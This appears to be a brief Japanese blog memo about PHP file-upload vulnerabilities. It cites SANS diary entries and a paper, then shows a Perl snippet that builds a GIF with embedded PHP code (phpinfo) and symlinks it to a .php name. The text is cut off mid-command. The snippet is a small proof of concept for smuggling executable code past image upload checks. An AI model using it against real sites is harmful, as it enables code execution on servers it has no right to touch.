http://isc.sans.org/diary.html?storyid=2997 http://isc.sans.org/diary.html?storyid=3003 ということで http://www.scanit.be/uploads/php-file-upload.pdf これを参考に実験 ってこれはPoC公開? use GD; my $img = new GD::Image(1,1); my $white = $img->colorAllocate(255,255,255); $img->transparent($white); binmode STDOUT; print $img->gif; print '<?php phpinfo() ?>'; これをファイルなり CGIなりで 1.gifを抽出 % ln -s 1.gif 1.php % file 1.gif 1.gi